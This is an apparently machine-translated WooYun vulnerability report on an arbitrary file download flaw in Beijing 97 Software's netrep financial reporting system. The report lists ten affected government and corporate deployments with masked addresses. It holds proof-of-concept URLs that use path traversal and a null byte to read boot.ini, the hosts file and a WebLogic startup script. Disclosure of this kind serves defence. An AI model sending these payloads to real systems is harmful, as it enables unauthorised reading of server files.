漏洞标题 任意财务文件系统任意文件下载漏洞 相关制造商 北京九七软件有限公司 漏洞作者 过路人 提交时间 2016-03-27 11: 30 公共时间 2016-06-29 10: 50 漏洞类型 任何文件遍历/下载 危险等级 在 自我评估等级 10 漏洞状态 已提交给第三方合作机构（cncert National Internet Emergency Center） 标签标签 任何文件读取，netrep，北京九七软件 漏洞详细信息 PoC（仅限Windows）: http://target/netrep/ebook/browse/download.jsp？jpgfilepath=c: \ boot.ini％00 \ jpg \ . \＆amp; outfiletype=xls http://target/netrep/ebook/browse/download.jsp？jpgfilepath=jpgfilepath=c: \ windows \ system32 \ drivers \ etc \ hosts％00 \ jpg \ . \＆amp; outfiletype=xls＆amp; outfiletype=xls http://target/netrep/ebook/browse/download.jsp？jpgfilepath=。\ StartWeblogic.sh％00 \ jpg \ . \＆amp; outfiletype=xls 漏洞证明： 以下系统确认存在此漏洞： 1）浙江省企业家庭快递在线直报系统:http://**。**。**。**/netrep / 2）中国通信集团财务报表管理信息系统:http://**。**。**。**/netrep / 3）河南省外商投资企业年度报告制度: **。**。**。**: 7005/netrep / 4）广西财务部企业财务会计信息网络报告系统: **。**。**。**: 7002/netrep / 5）河北省财政厅企业信息报告系统: **。**。**。**: 7001/netrep / 6）朝阳区财政局报告管理系统: **。**。**。**: 8001/netrep / 7）河南省财务会计最终会计数据收集系统: **。**。**。**: 7020/netrep / 8）经济开发区北京对外经济报告数据管理系统:http://**。**。**。**/netrep / 9）宁波市财务会计信息网络报告系统:http://**。**。**。**: 9020/netrep / 10）中国交通建设股份有限公司劳动管理报告管理系统: **。**。**。**/netrep / . 修理计划： 没有。 版权声明：请注明出处。居民A @乌云